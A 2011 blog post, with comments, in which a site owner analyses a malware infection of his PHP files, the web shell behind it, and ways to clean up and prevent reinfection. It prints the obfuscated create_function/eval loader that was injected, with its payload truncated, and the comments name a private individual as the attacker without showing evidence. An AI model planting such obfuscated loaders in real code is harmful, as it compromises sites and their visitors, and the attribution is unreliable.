Malware Alert - September 2011 - SShell v.1.0


I was very unfortunate to discover today that someone has breached into my hosting account. This has happened in one of the last few days, but remained unnoticed by me until today.


All of my PHP files were infected with the following piece of code:


<?php
$md5 = "f8037bfb868e6c652d88c420b78404cd";
$wp_salt = array("(","i","4","o","e",'f','v','l',"$",'z',"r",'6','t',"c","g","n",')','b','s',"d",";",'_','a');
$wp_add_filter = create_function('$'.'v',$wp_salt[4].$wp_salt[6].$wp_salt[22].$wp_salt[7].$wp_salt[0].$wp_salt[14].$wp_salt[9].$wp_salt[1].$wp_salt[15].$wp_salt[5].$wp_salt[7].$wp_salt[22].$wp_salt[12].$wp_salt[4].$wp_salt[0].$wp_salt[17].$wp_salt[22].$wp_salt[18].$wp_salt[4].$wp_salt[11].$wp_salt[2].$wp_salt[21].$wp_salt[19].$wp_salt[4].$wp_salt[13].$wp_salt[3].$wp_salt[19].$wp_salt[4].$wp_salt[0].$wp_salt[8].$wp_salt[6].$wp_salt[16].$wp_salt[16].$wp_salt[16].$wp_salt[20]);
$wp_add_filter('FZhHsoXIkkSX8+sbA+Cira0HaK01kza01prV96sdZGaEux/P8kqHf+qvnaohPcp/snQvcfT/ijKfi/Kf/...');
?>

I was really upset. Doing a search on Google for similar complaints, I found this report at Stack Overflow: [LINK]


A guy over there linked to an article at PHP-Beginners.com for more details: [LINK]


The guys at PHP Beginners were kind enough to share a cleaner script that removes the malicious code from your PHP files and although it did a great job, that wasn't enough for me - I was really, really upset that the security of my hosting account was compromised, so I decided to dig deeper into the problem. Examining my error logs and all the raw access logs associated with my hosting account, I discovered a good amount of suspicious files in the "wp-content" folder of my WordPress installation and in the "cgi-bin" folder of an old video sharing website I've developed last year, but that's no longer active.


I downloaded those and started to reverse engineer the whole thing, extensively using the help of these two great tools: PHP Decoder and PHP Formatter


It's worth mentioning here, that I ended up using these two, because I figured out that the whole:


<?php
$wp_salt = array("(","i","4","o","e",'f','v','l',"$",'z',"r",'6','t',"c","g","n",')','b','s',"d",";",'_','a');
$wp_add_filter = create_function('$'.'v',$wp_salt[4].$wp_salt[6].$wp_salt[22].$wp_salt[7].$wp_salt[0].$wp_salt[14].$wp_salt[9].$wp_salt[1].$wp_salt[15].$wp_salt[5].$wp_salt[7].$wp_salt[22].$wp_salt[12].$wp_salt[4].$wp_salt[0].$wp_salt[17].$wp_salt[22].$wp_salt[18].$wp_salt[4].$wp_salt[11].$wp_salt[2].$wp_salt[21].$wp_salt[19].$wp_salt[4].$wp_salt[13].$wp_salt[3].$wp_salt[19].$wp_salt[4].$wp_salt[0].$wp_salt[8].$wp_salt[6].$wp_salt[16].$wp_salt[16].$wp_salt[16].$wp_salt[20]);
$wp_add_filter('FZhHsoXIkkSX8+sbA+Cira0HaK01kza01prV96sdZGaEux/P8kqHf+qvnaohPcp/snQvcfT/ijKfi/Kf/...');
?>

...thing is actually an encrypted way of executing nested eval(gzinflate(base64_decode('SOME_BASE64_ENCODED_STRING')))); instructions. Here is the entire decrypted piece of malicious code that's inserted into each PHP file on your server: [LINK]


So the malicious code injected into my PHP files was basically making use of PHP's output buffering functionality, so it looks like it altered the output of my scripts, adding a handful of malicious links to all of them. (By the way I keep a list of all the links, if anyone's interested in acquiring it) This code also refered to one of the files placed in the "cgi-bin" folder of that old video sharing website, so I immediately started decrypting all my findings and here's what I got: [LINK]


To my dismay, it turned out that the virus can do much more harm than what it looked like. It turned out that one of the malware files in the "cgi-bin" folder is a shell script that gives the hackers full access to the server. It allows them to browse through your files, acquire access to your databases, FTP credentials, execute malicious pieces of PHP code and pretty much do anything they want...


The "wp-content" folder contained almost the same files as the "cgi-bin" folder. However, there's an additional file called "wp-thumb-creator.php". I was terrified when I saw its decrypted code [LINK] as this was the file that did all the injection. It seems to have some connection with ydmns1.com, which is hosted somewhere in Germany, so it's either Germans standing behind the attack or a machine in Germany is exploited and used by the hackers...


Anyway, that whole thing seems to be called !SShell v. 1.0 shadow edition!, so please spread the word about it and help other people protect themselves from it. Although the cleaner script that the PHP-Beginners.com guys supplied does a great job, you won't stop this thing from happening again, unless you discover and delete the SShell file and the "wp-thumb-creator.php" file that injects the malicious code into all of your PHP files. You may also want to add the following line to your php.ini file as a preventive measure, so even if you get infected again, their code won't be able to work:


disable_functions = create_function,gzinflate,eval,base64_decode


It looks like the mass attacks with this malware started this month (September 2011), as I see a growing number of people complaining about it. It looks like !SShell v. 1.0 shadow edition! is actually a modified version of the Russian c99madshell script, full info on which can be found here: [LINK]

Comments

Nifty Options wrote (11 days ago)

Very Good Site and awesome writing too , and great thanks to the writer

Nifty options

Marin wrote (3 years ago)

In that case, investigate any of your files PHP that perform writing operations like fwrite() or file_ put_contents().

Also, check you directory permissions. Depending on your server environment, you may want to limit public permissions on certain folders, for example using: 755 on folders that are currently 775 or 777

Hope that helps...

Amit Suneja wrote (3 years ago)

Hi Marin! We're not using Word Press... our sites are core php.. no frameworks!

Marin wrote (3 years ago)

Hello Amit, check the link that Rich provided a few comments below. It explains that you should update the version of your Timthumb plugin.

Amit Suneja wrote (3 years ago)

Hi.. interesting reading here. This has recently infected our Core PHP files.. i got the functions disabled, but how do i check where the vulnerability lies? I really need to stop this from happening!
thanks.

Marin wrote (3 years ago)

Great to hear that Rich! I've enabled your link, so people arriving at this article can see it.

Rich wrote (3 years ago)

For many users, the original vulnerability seems to be related to timthumb.php. Here's a fix:
http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/

Chico wrote (3 years ago)

I !
I'm actually interested by your proposal of sending all the links generated by this script that you collected.
Could you, please ?

Marin wrote (3 years ago)

Hmmm, you're actually right. It looks like the only way to disable it is using suhosin. The problem though is that WordPress still uses create_function, gzinflate and eval in many of its core files, so if you disable them that may break something in your blog...

Mickey wrote (3 years ago)

disable_functions = create_function,gzinflate,eval,base64_decode

In the above, I don't think listing 'eval' will do anything as 'eval' is a language construct not a function.

http://php.net/manual/en/function.eval.php

Marin wrote (3 years ago)

Well, the wp-thumb-creator.php file, which me and Paolo from PHP-Beginners think is the main virus file, was located in my "wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/" folder, so this may be a tinyMCE exploit, but I'm not 100% sure. tinyMCE exploits affecting WordPress have been reported before: [LINK] and I see that recently people on the WordPress forums started complaining about this malware attack too: [LINK]

graeme wrote (3 years ago)

Good call with the disable_function. Any other thoughts on what caused this or how to prevent it? I believe it is a wordpress flaw but not sure if there is a patch?

Marin wrote (3 years ago)

Some more info on the topic. The domain collecting the info ydmns1.com is registered at:
RUSTELEKOM LLC
Website: http://rustelekom.biz
Rustelekom have been known for a long while as a company providing shelter to hackers and spammers as reported here: [LINK]
The domain ydmns1.com itself is operated by a guy from Moscow called Vladislav Nosenko. Full info can be found here: [LINK] (that's a whois on one of his older domains)

Nino Paolo wrote (3 years ago)

Wow! Awesome! great job Marin :) Thanks for sharing this information, this is really helpful. We have now an idea what it is. I didn't know it would that harmful, at first, I thought it's just a spam links. Thanks again. - Paolo

Marin wrote (3 years ago)

Actually the hackers seem to be of Russian origin...